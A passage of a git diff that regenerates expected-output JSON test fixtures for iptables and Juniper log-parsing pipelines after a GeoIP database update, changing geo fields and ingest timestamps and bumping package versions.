WINDOW=65535 RES=0x00 SYN URGP=0 ", "type": [ "denied", @@ -1063,36 +1075,24 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, @@ -1117,7 +1117,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:39:42.195787800Z", + "ingested": "2021-12-14T14:47:01.888418313Z", "original": "Jan 22 09:05:05 ubuntu-bionic kernel: [16571.459614] IN= OUT=lo SRC=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 DST=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 LEN=104 TC=0 HOPLIMIT=64 FLOWLBL=868225 PROTO=ICMPv6 TYPE=128 CODE=0 ID=3427 SEQ=1 ", "category": [ "network" @@ -1173,7 +1173,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:39:42.195793700Z", + "ingested": "2021-12-14T14:47:01.888418699Z", "original": "Jan 22 10:52:34 ubuntu-bionic kernel: [ 307.757925] IN= OUT=enp0s3 MAC=90:10:12:34:56:78:90:10:aa:bb:cc:dd:86:dd:ff:ff SRC=fe80:0000:0000:0000:0084:88ff:feae:790a DST=ff02:0000:0000:0000:0000:0000:0000:0016 LEN=96 TC=0 HOPLIMIT=1 FLOWLBL=0 PROTO=ICMPv6 TYPE=143 CODE=0 MARK=0xd4", "category": [ "network" @@ -1205,20 +1205,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "port": 48689, @@ -1258,7 +1252,7 @@ }, "event": { "action": "accept", - "ingested": "2021-12-09T13:39:42.195800900Z", + "ingested": "2021-12-14T14:47:01.888419227Z", "original": "Jan 5 20:17:05 MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=81.2.69.143 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520 ", "type": [ "allowed", @@ -1334,7 +1328,7 @@ }, "event": { "action": "accept", - "ingested": "2021-12-09T13:39:42.195805200Z", + "ingested": "2021-12-14T14:47:01.888419617Z", "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.168.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0 ", "type": [ "allowed", @@ -1417,7 +1411,7 @@ }, "event": { "action": "drop", - "ingested": "2021-12-09T13:39:42.195810200Z", + "ingested": "2021-12-14T14:47:01.888420015Z", "original": "Jan 5 20:17:01 MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0 ", "type": [ "denied", @@ -1492,7 +1486,7 @@ }, "event": { "action": "accept", - "ingested": "2021-12-09T13:39:42.195816500Z", + "ingested": "2021-12-14T14:47:01.888420648Z", "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0 ", "type": [ "allowed", @@ -1567,7 +1561,7 @@ }, "event": { "action": "accept", - "ingested": "2021-12-09T13:39:42.195823800Z", + "ingested": "2021-12-14T14:47:01.888421047Z", "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0 ", "type": [ "allowed", diff --git a/packages/iptables/data_stream/log/_dev/test/pipeline/test-ubiquiti.log-expected.json b/packages/iptables/data_stream/log/_dev/test/pipeline/test-ubiquiti.log-expected.json index 6a87be00a00..3536b05d369 100644 --- a/packages/iptables/data_stream/log/_dev/test/pipeline/test-ubiquiti.log-expected.json +++ b/packages/iptables/data_stream/log/_dev/test/pipeline/test-ubiquiti.log-expected.json @@ -21,20 +21,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "port": 48689, @@ -74,7 +68,7 @@ }, "event": { "action": "accept", - "ingested": "2021-12-09T13:39:44.256951500Z", + "ingested": "2021-12-14T14:47:03.869988957Z", "original": "Jan 5 20:17:05 MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=81.2.69.143 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520", "type": [ "allowed", @@ -150,7 +144,7 @@ }, "event": { "action": "accept", - "ingested": "2021-12-09T13:39:44.256960300Z", + "ingested": "2021-12-14T14:47:03.869991678Z", "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.168.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0", "type": [ "allowed", @@ -233,7 +227,7 @@ }, "event": { "action": "drop", - "ingested": "2021-12-09T13:39:44.256966Z", + "ingested": "2021-12-14T14:47:03.869992099Z", "original": "Jan 5 20:17:01 MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0", "type": [ "denied", @@ -308,7 +302,7 @@ }, "event": { "action": "accept", - "ingested": "2021-12-09T13:39:44.256969400Z", + "ingested": "2021-12-14T14:47:03.869992474Z", "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0", "type": [ "allowed", @@ -383,7 +377,7 @@ }, "event": { "action": "accept", - "ingested": "2021-12-09T13:39:44.256973800Z", + "ingested": "2021-12-14T14:47:03.869992858Z", "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0", "type": [ "allowed", @@ -408,19 +402,6 @@ "ttl": 126, "id": 15317 }, - "destination": { - "port": 443 - }, - "source": { - "port": 59344 - }, - "message": "My-Office-Gateway user.info kernel: TTL=126 ID=15317 DF PROTO=TCP SPT=59344 DPT=443 WINDOW=8212 RES=0x00 ACK PSH URGP=0", - "tags": [ - "preserve_original_event" - ], - "network": { - "transport": "tcp" - }, "observer": { "name": "My-Office-Gateway" }, @@ -428,13 +409,26 @@ "ecs": { "version": "1.12.0" }, + "destination": { + "port": 443 + }, + "source": { + "port": 59344 + }, + "message": "My-Office-Gateway user.info kernel: TTL=126 ID=15317 DF PROTO=TCP SPT=59344 DPT=443 WINDOW=8212 RES=0x00 ACK PSH URGP=0", "event": { - "ingested": "2021-12-09T13:39:44.256978900Z", + "ingested": "2021-12-14T14:47:03.869993224Z", "original": "May 5 20:46:45 My-Office-Gateway user.info kernel: TTL=126 ID=15317 DF PROTO=TCP SPT=59344 DPT=443 WINDOW=8212 RES=0x00 ACK PSH URGP=0", "category": [ "network" ], "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "transport": "tcp" } }, { @@ -450,19 +444,6 @@ "ttl": 126, "id": 51392 }, - "destination": { - "port": 7914 - }, - "source": { - "port": 51653 - }, - "message": "My-Office-Gateway user.info kernel: TTL=126 ID=51392 DF PROTO=TCP SPT=51653 DPT=7914 WINDOW=1024 RES=0x00 ACK PSH URGP=0", - "tags": [ - "preserve_original_event" - ], - "network": { - "transport": "tcp" - }, "observer": { "name": "My-Office-Gateway" }, @@ -470,13 +451,26 @@ "ecs": { "version": "1.12.0" }, + "destination": { + "port": 7914 + }, + "source": { + "port": 51653 + }, + "message": "My-Office-Gateway user.info kernel: TTL=126 ID=51392 DF PROTO=TCP SPT=51653 DPT=7914 WINDOW=1024 RES=0x00 ACK PSH URGP=0", "event": { - "ingested": "2021-12-09T13:39:44.256983800Z", + "ingested": "2021-12-14T14:47:03.869993589Z", "original": "May 5 20:46:46 My-Office-Gateway user.info kernel: TTL=126 ID=51392 DF PROTO=TCP SPT=51653 DPT=7914 WINDOW=1024 RES=0x00 ACK PSH URGP=0", "category": [ "network" ], "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "transport": "tcp" } }, { @@ -491,19 +485,6 @@ "ttl": 126, "id": 8698 }, - "destination": { - "port": 51179 - }, - "source": { - "port": 88 - }, - "message": "My-Office-Gateway user.info kernel: L=126 ID=8698 DF PROTO=TCP SPT=88 DPT=51179 WINDOW=2053 RES=0x00 ACK URGP=0", - "tags": [ - "preserve_original_event" - ], - "network": { - "transport": "tcp" - }, "observer": { "name": "My-Office-Gateway" }, @@ -511,13 +492,26 @@ "ecs": { "version": "1.12.0" }, + "destination": { + "port": 51179 + }, + "source": { + "port": 88 + }, + "message": "My-Office-Gateway user.info kernel: L=126 ID=8698 DF PROTO=TCP SPT=88 DPT=51179 WINDOW=2053 RES=0x00 ACK URGP=0", "event": { - "ingested": "2021-12-09T13:39:44.256987700Z", + "ingested": "2021-12-14T14:47:03.869994023Z", "original": "May 5 20:46:46 My-Office-Gateway user.info kernel: L=126 ID=8698 DF PROTO=TCP SPT=88 DPT=51179 WINDOW=2053 RES=0x00 ACK URGP=0", "category": [ "network" ], "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "transport": "tcp" } }, { @@ -533,19 +527,6 @@ "ttl": 126, "id": 15461 }, - "destination": { - "port": 443 - }, - "source": { - "port": 59289 - }, - "message": "My-Office-Gateway user.info kernel: 0 TTL=126 ID=15461 DF PROTO=TCP SPT=59289 DPT=443 WINDOW=8208 RES=0x00 ACK PSH URGP=0", - "tags": [ - "preserve_original_event" - ], - "network": { - "transport": "tcp" - }, "observer": { "name": "My-Office-Gateway" }, @@ -553,13 +534,26 @@ "ecs": { "version": "1.12.0" }, + "destination": { + "port": 443 + }, + "source": { + "port": 59289 + }, + "message": "My-Office-Gateway user.info kernel: 0 TTL=126 ID=15461 DF PROTO=TCP SPT=59289 DPT=443 WINDOW=8208 RES=0x00 ACK PSH URGP=0", "event": { - "ingested": "2021-12-09T13:39:44.256992200Z", + "ingested": "2021-12-14T14:47:03.869994386Z", "original": "May 5 20:47:09 My-Office-Gateway user.info kernel: 0 TTL=126 ID=15461 DF PROTO=TCP SPT=59289 DPT=443 WINDOW=8208 RES=0x00 ACK PSH URGP=0", "category": [ "network" ], "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "transport": "tcp" } }, { @@ -574,19 +568,6 @@ "ttl": 126, "id": 8702 }, - "destination": { - "port": 51182 - }, - "source": { - "port": 88 - }, - "message": "My-Office-Gateway user.info kernel: L=126 ID=8702 DF PROTO=TCP SPT=88 DPT=51182 WINDOW=2053 RES=0x00 ACK URGP=0", - "tags": [ - "preserve_original_event" - ], - "network": { - "transport": "tcp" - }, "observer": { "name": "My-Office-Gateway" }, @@ -594,13 +575,26 @@ "ecs": { "version": "1.12.0" }, + "destination": { + "port": 51182 + }, + "source": { + "port": 88 + }, + "message": "My-Office-Gateway user.info kernel: L=126 ID=8702 DF PROTO=TCP SPT=88 DPT=51182 WINDOW=2053 RES=0x00 ACK URGP=0", "event": { - "ingested": "2021-12-09T13:39:44.256996700Z", + "ingested": "2021-12-14T14:47:03.869994749Z", "original": "May 5 20:46:56 My-Office-Gateway user.info kernel: L=126 ID=8702 DF PROTO=TCP SPT=88 DPT=51182 WINDOW=2053 RES=0x00 ACK URGP=0", "category": [ "network" ], "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "transport": "tcp" } }, { @@ -617,19 +611,6 @@ "ttl": 126, "id": 4622 }, - "destination": { - "port": 49209 - }, - "source": { - "port": 389 - }, - "message": "My-Office-Gateway user.info kernel: TL=126 ID=4622 DF PROTO=TCP SPT=389 DPT=49209 WINDOW=8192 RES=0x00 ECE ACK SYN URGP=0", - "tags": [ - "preserve_original_event" - ], - "network": { - "transport": "tcp" - }, "observer": { "name": "My-Office-Gateway" }, @@ -637,13 +618,26 @@ "ecs": { "version": "1.12.0" }, + "destination": { + "port": 49209 + }, + "source": { + "port": 389 + }, + "message": "My-Office-Gateway user.info kernel: TL=126 ID=4622 DF PROTO=TCP SPT=389 DPT=49209 WINDOW=8192 RES=0x00 ECE ACK SYN URGP=0", "event": { - "ingested": "2021-12-09T13:39:44.257000500Z", + "ingested": "2021-12-14T14:47:03.869995132Z", "original": "May 5 20:45:44 My-Office-Gateway user.info kernel: TL=126 ID=4622 DF PROTO=TCP SPT=389 DPT=49209 WINDOW=8192 RES=0x00 ECE ACK SYN URGP=0", "category": [ "network" ], "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "transport": "tcp" } } ] diff --git a/packages/iptables/manifest.yml b/packages/iptables/manifest.yml index 2a29abe83af..1330a53ddf5 100644 --- a/packages/iptables/manifest.yml +++ b/packages/iptables/manifest.yml @@ -1,6 +1,6 @@ name: iptables title: Iptables Logs -version: 0.6.1 +version: 0.6.2 release: experimental description: Collect and parse logs from iptables and ip6tables with Elastic Agent. type: integration diff --git a/packages/juniper/changelog.yml b/packages/juniper/changelog.yml index 0d92fd3d432..34a3f06f947 100644 --- a/packages/juniper/changelog.yml +++ b/packages/juniper/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.0.7" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.0.6" changes: - description: Change test public IPs to the supported subset diff --git a/packages/juniper/data_stream/junos/_dev/test/pipeline/test-generated.log-expected.json b/packages/juniper/data_stream/junos/_dev/test/pipeline/test-generated.log-expected.json index fba6e68bbbe..1dfe0ef2f37 100644 --- a/packages/juniper/data_stream/junos/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/juniper/data_stream/junos/_dev/test/pipeline/test-generated.log-expected.json @@ -3,7 +3,7 @@ { "message": "Jan 29 06:09:59 ceroinBC.exe[6713]: RPD_SCHED_TASK_LONGRUNTIME: : exe ran for 7309(5049)", "event": { - "ingested": "2021-12-10T10:13:45.067851400Z" + "ingested": "2021-12-14T14:47:05.643310048Z" }, "ecs": { "version": "1.12.0" @@ -15,7 +15,7 @@ { "message": "Feb 12 13:12:33 DCD_FILTER_LIB_ERROR message repeated [7608]: llu: Filter library initialization failed", "event": { - "ingested": "2021-12-10T10:13:45.067872Z" + "ingested": "2021-12-14T14:47:05.643314375Z" }, "ecs": { "version": "1.12.0" @@ -27,7 +27,7 @@ { "message": "Feb 26 20:15:08 MIB2D_TRAP_SEND_FAILURE: restart [6747]: sum: uaerat: cancel: success", "event": { - "ingested": "2021-12-10T10:13:45.067881900Z" + "ingested": "2021-12-14T14:47:05.643315434Z" }, "ecs": { "version": "1.12.0" @@ -39,7 +39,7 @@ { "message": "Mar 12 03:17:42 seq olorema6148.www.localdomain: fug5500.www.domain IFP trace\u003e node: dqu", "event": { - "ingested": "2021-12-10T10:13:45.067891500Z" + "ingested": "2021-12-14T14:47:05.643316242Z" }, "ecs": { "version": "1.12.0" @@ -51,7 +51,7 @@ { "message": "Mar 26 10:20:16 ssb SNMPD_CONTEXT_ERROR: [7400]: emq: isiu: success in 6237 context 5367", "event": { - "ingested": "2021-12-10T10:13:45.067900900Z" + "ingested": "2021-12-14T14:47:05.643316874Z" }, "ecs": { "version": "1.12.0" @@ -63,7 +63,7 @@ { "message": "Apr 9 17:22:51 RPD_KRT_IFL_CELL_RELAY_MODE_UNSPECIFIED: restart [7618]: ionul: ifl : nibus, unknown", "event": { - "ingested": "2021-12-10T10:13:45.067910Z" + "ingested": "2021-12-14T14:47:05.643317592Z" }, "ecs": { "version": "1.12.0" @@ -75,7 +75,7 @@ { "message": "Apr 24 00:25:25 CHASSISD_SNMP_TRAP10 message repeated [1284]: ume: SNMP trap: failure: ono", "event": { - "ingested": "2021-12-10T10:13:45.067919200Z" + "ingested": "2021-12-14T14:47:05.643318250Z" }, "ecs": { "version": "1.12.0" @@ -87,7 +87,7 @@ { "message": "May 8 07:27:59 sunt prehen6218.www.localhost: onse.exe[254]: RPD_KRT_IFL_CELL_RELAY_MODE_INVALID: : ifl : inibusBo, failure", "event": { - "ingested": "2021-12-10T10:13:45.067928300Z" + "ingested": "2021-12-14T14:47:05.643318893Z" }, "ecs": { "version": "1.12.0" @@ -99,7 +99,7 @@ { "message": "May 22 14:30:33 iamquis quirat6972.www5.lan: isc.exe[3237]: SNMPD_USER_ERROR: : conseq: unknown in 6404 user 'atiset' 4068", "event": { - "ingested": "2021-12-10T10:13:45.067937600Z" + "ingested": "2021-12-14T14:47:05.643319450Z" }, "ecs": { "version": "1.12.0" @@ -111,7 +111,7 @@ { "message": "Jun 5 21:33:08 fpc9 RPD_TASK_REINIT: [4621]: lita: Reinitializing", "event": { - "ingested": "2021-12-10T10:13:45.067943700Z" + "ingested": "2021-12-14T14:47:05.643323433Z" }, "ecs": { "version": "1.12.0" @@ -123,7 +123,7 @@ { "message": "Jun 20 04:35:42 fpc4 LOGIN_FAILED: [2227]: oinBC: Login failed for user quameius from host ipsumdol4488.api.localdomain", "event": { - "ingested": "2021-12-10T10:13:45.067950200Z" + "ingested": "2021-12-14T14:47:05.643324259Z" }, "ecs": { "version": "1.12.0" @@ -135,7 +135,7 @@ { "message": "Jul 4 11:38:16 NASD_PPP_SEND_PARTIAL: restart [3994]: aper: Unable to send all of message: santiumd", "event": { - "ingested": "2021-12-10T10:13:45.067960Z" + "ingested": "2021-12-14T14:47:05.643325133Z" }, "ecs": { "version": "1.12.0" @@ -147,7 +147,7 @@ { "message": "Jul 18 18:40:50 UI_COMMIT_AT_FAILED message repeated [7440]: temqu: success, minimav", "event": { - "ingested": "2021-12-10T10:13:45.067969400Z" + "ingested": "2021-12-14T14:47:05.643325765Z" }, "ecs": { "version": "1.12.0" @@ -159,7 +159,7 @@ { "message": "Aug 2 01:43:25 rnatur ofdeFin7811.lan: emipsumd.exe[5020]: BOOTPD_NEW_CONF: : New configuration installed", "event": { - "ingested": "2021-12-10T10:13:45.067978700Z" + "ingested": "2021-12-14T14:47:05.643326507Z" }, "ecs": { "version": "1.12.0" @@ -171,7 +171,7 @@ { "message": "Aug 16 08:45:59 RPD_RIP_JOIN_MULTICAST message repeated [60]: onemulla: Unable to join multicast group enp0s4292: unknown", "event": { - "ingested": "2021-12-10T10:13:45.067988100Z" + "ingested": "2021-12-14T14:47:05.643400742Z" }, "ecs": { "version": "1.12.0" @@ -183,7 +183,7 @@ { "message": "Aug 30 15:48:33 FSAD_TERMINATED_CONNECTION: restart [6703]: xea: Open file ites` closed due to unknown", "event": { - "ingested": "2021-12-10T10:13:45.067994600Z" + "ingested": "2021-12-14T14:47:05.643401843Z" }, "ecs": { "version": "1.12.0" @@ -195,7 +195,7 @@ { "message": "Sep 13 22:51:07 RPD_KRT_IFL_GENERATION message repeated [5539]: eri: ifl lo2169 generation mismatch -- unknown", "event": { - "ingested": "2021-12-10T10:13:45.068001300Z" + "ingested": "2021-12-14T14:47:05.643402803Z" }, "ecs": { "version": "1.12.0" @@ -207,7 +207,7 @@ { "message": "Sep 28 05:53:42 cfeb UI_COMMIT_ROLLBACK_FAILED: [3453]: avolu: Automatic rollback failed", "event": { - "ingested": "2021-12-10T10:13:45.068018400Z" + "ingested": "2021-12-14T14:47:05.643403274Z" }, "ecs": { "version": "1.12.0" @@ -219,7 +219,7 @@ { "message": "Oct 12 12:56:16 mquisn.exe[3993]: RMOPD_usage : failure: midest", "event": { - "ingested": "2021-12-10T10:13:45.068028Z" + "ingested": "2021-12-14T14:47:05.643403758Z" }, "ecs": { "version": "1.12.0" @@ -231,7 +231,7 @@ { "message": "Oct 26 19:58:50 undeomni.exe[4938]: RPD_ISIS_LSPCKSUM: : IS-IS 715 LSP checksum error, interface enp0s1965, LSP id tasun, sequence 3203, checksum eratv, lifetime ipsa", "event": { - "ingested": "2021-12-10T10:13:45.068037100Z" + "ingested": "2021-12-14T14:47:05.643404229Z" }, "ecs": { "version": "1.12.0" @@ -243,7 +243,7 @@ { "message": "Nov 10 03:01:24 kmd: restart ", "event": { - "ingested": "2021-12-10T10:13:45.068046400Z" + "ingested": "2021-12-14T14:47:05.643404719Z" }, "ecs": { "version": "1.12.0" @@ -255,7 +255,7 @@ { "message": "Nov 24 10:03:59 ever.exe[6463]: LOGIN_FAILED: : Login failed for user atq from host erspi4926.www5.test", "event": { - "ingested": "2021-12-10T10:13:45.068055500Z" + "ingested": "2021-12-14T14:47:05.643405206Z" }, "ecs": { "version": "1.12.0" @@ -267,7 +267,7 @@ { "message": "Dec 8 17:06:33 CHASSISD_MBUS_ERROR message repeated [72]: iadese: nisiu imad: management bus failed sanity test", "event": { - "ingested": "2021-12-10T10:13:45.068064400Z" + "ingested": "2021-12-14T14:47:05.643405864Z" }, "ecs": { "version": "1.12.0" @@ -279,7 +279,7 @@ { "message": "Dec 23 00:09:07 niamquis.exe[1471]: TFTPD_NAK_ERR : nak error ptatems, 357", "event": { - "ingested": "2021-12-10T10:13:45.068073800Z" + "ingested": "2021-12-14T14:47:05.643406499Z" }, "ecs": { "version": "1.12.0" @@ -291,7 +291,7 @@ { "message": "Jan 6 07:11:41 UI_DUPLICATE_UID: restart [3350]: atqu: Users naturau have the same UID olorsita", "event": { - "ingested": "2021-12-10T10:13:45.068082900Z" + "ingested": "2021-12-14T14:47:05.643406974Z" }, "ecs": { "version": "1.12.0" @@ -303,7 +303,7 @@ { "message": "Jan 20 14:14:16 piscivel.exe[4753]: TFTPD_CREATE_ERR: : check_space unknown", "event": { - "ingested": "2021-12-10T10:13:45.068092300Z" + "ingested": "2021-12-14T14:47:05.643407451Z" }, "ecs": { "version": "1.12.0" @@ -315,7 +315,7 @@ { "message": "Feb 3 21:16:50 fpc4 RPD_START: [1269]: riat: Start 181 version version built 7425", "event": { - "ingested": "2021-12-10T10:13:45.068101400Z" + "ingested": "2021-12-14T14:47:05.643407925Z" }, "ecs": { "version": "1.12.0" @@ -327,7 +327,7 @@ { "message": "Feb 18 04:19:24 fpc2 COSMAN: : uptasnul: delete class_to_ifl table 2069, ifl 3693", "event": { - "ingested": "2021-12-10T10:13:45.068110800Z" + "ingested": "2021-12-14T14:47:05.643408378Z" }, "ecs": { "version": "1.12.0" @@ -339,7 +339,7 @@ { "message": "Mar 4 11:21:59 orum oinBCSed3073.www.lan: ilm.exe[3193]: SNMPD_TRAP_QUEUE_MAX_ATTEMPTS: : fugiatqu: after 4003 attempts, deleting 4568 traps queued to exercita", "event": { - "ingested": "2021-12-10T10:13:45.068120300Z" + "ingested": "2021-12-14T14:47:05.643408858Z" }, "ecs": { "version": "1.12.0" @@ -351,7 +351,7 @@ { "message": "Mar 18 18:24:33 TFTPD_BIND_ERR: restart [1431]: ntut: bind: failure", "event": { - "ingested": "2021-12-10T10:13:45.068129Z" + "ingested": "2021-12-14T14:47:05.643409368Z" }, "ecs": { "version": "1.12.0" @@ -363,7 +363,7 @@ { "message": "Apr 2 01:27:07 lite ugia517.api.host: doei.exe[7073]: RPD_LDP_SESSIONDOWN: : LDP session 10.88.126.165 is down, failure", "event": { - "ingested": "2021-12-10T10:13:45.068132900Z" + "ingested": "2021-12-14T14:47:05.643409840Z" }, "ecs": { "version": "1.12.0" @@ -375,7 +375,7 @@ { "message": "Apr 16 08:29:41 fpc6 SNMPD_CONTEXT_ERROR: [180]: eturadip: ent: unknown in 5848 context 316", "event": { - "ingested": "2021-12-10T10:13:45.068139Z" + "ingested": "2021-12-14T14:47:05.643410294Z" }, "ecs": { "version": "1.12.0" @@ -387,7 +387,7 @@ { "message": "Apr 30 15:32:16 NASD_CHAP_INVALID_CHAP_IDENTIFIER message repeated [796]: iumdo: lo2721: received aturv expected CHAP ID: ectetura", "event": { - "ingested": "2021-12-10T10:13:45.068148500Z" + "ingested": "2021-12-14T14:47:05.643410747Z" }, "ecs": { "version": "1.12.0" @@ -399,7 +399,7 @@ { "message": "May 14 22:34:50 UI_LOAD_EVENT message repeated [6342]: seq: User 'moll' is performing a 'allow'", "event": { - "ingested": "2021-12-10T10:13:45.068157900Z" + "ingested": "2021-12-14T14:47:05.643411210Z" }, "ecs": { "version": "1.12.0" @@ -411,7 +411,7 @@ { "message": "May 29 05:37:24 fdeFin.exe[4053]: SNMP_TRAP_TRACE_ROUTE_TEST_FAILED : traceRouteCtlOwnerIndex = 1450, traceRouteCtlTestName = edic", "event": { - "ingested": "2021-12-10T10:13:45.068166400Z" + "ingested": "2021-12-14T14:47:05.643411849Z" }, "ecs": { "version": "1.12.0" @@ -423,7 +423,7 @@ { "message": "Jun 12 12:39:58 SNMPD_RTSLIB_ASYNC_EVENT: restart [508]: uae: oremip: sequence mismatch failure", "event": { - "ingested": "2021-12-10T10:13:45.068172600Z" + "ingested": "2021-12-14T14:47:05.643412305Z" }, "ecs": { "version": "1.12.0" @@ -435,7 +435,7 @@ { "message": "Jun 26 19:42:33 tesse olupta2743.internal.localdomain: ine.exe[3181]: BOOTPD_TIMEOUT: : Timeout success unreasonable", "event": { - "ingested": "2021-12-10T10:13:45.068178900Z" + "ingested": "2021-12-14T14:47:05.643412755Z" }, "ecs": { "version": "1.12.0" @@ -447,7 +447,7 @@ { "message": "Jul 11 02:45:07 NASD_RADIUS_MESSAGE_UNEXPECTED message repeated [33]: abore: Unknown response from RADIUS server: unknown", "event": { - "ingested": "2021-12-10T10:13:45.068185800Z" + "ingested": "2021-12-14T14:47:05.643413211Z" }, "ecs": { "version": "1.12.0" @@ -459,7 +459,7 @@ { "message": "Jul 25 09:47:41 PWC_LOCKFILE_BAD_FORMAT: restart [3426]: illum: PID lock file has bad format: eprehe", "event": { - "ingested": "2021-12-10T10:13:45.068195100Z" + "ingested": "2021-12-14T14:47:05.643413674Z" }, "ecs": { "version": "1.12.0" @@ -471,7 +471,7 @@ { "message": "Aug 8 16:50:15 snostr.exe[1613]: RPD_KRT_AFUNSUPRT : tec: received itaspe message with unsupported address family 4176", "event": { - "ingested": "2021-12-10T10:13:45.068204100Z" + "ingested": "2021-12-14T14:47:05.643414447Z" }, "ecs": { "version": "1.12.0" @@ -483,7 +483,7 @@ { "message": "Aug 22 23:52:50 oreeufug.exe[6086]: PWC_PROCESS_FORCED_HOLD : Process plicaboN forcing hold down of child 619 until signal", "event": { - "ingested": "2021-12-10T10:13:45.068213200Z" + "ingested": "2021-12-14T14:47:05.643414937Z" }, "ecs": { "version": "1.12.0" @@ -495,7 +495,7 @@ { "message": "Sep 6 06:55:24 MIB2D_IFL_IFINDEX_FAILURE message repeated [4115]: tiu: SNMP index assigned to wri changed from 3902 to unknown", "event": { - "ingested": "2021-12-10T10:13:45.068222300Z" + "ingested": "2021-12-14T14:47:05.643415518Z" }, "ecs": { "version": 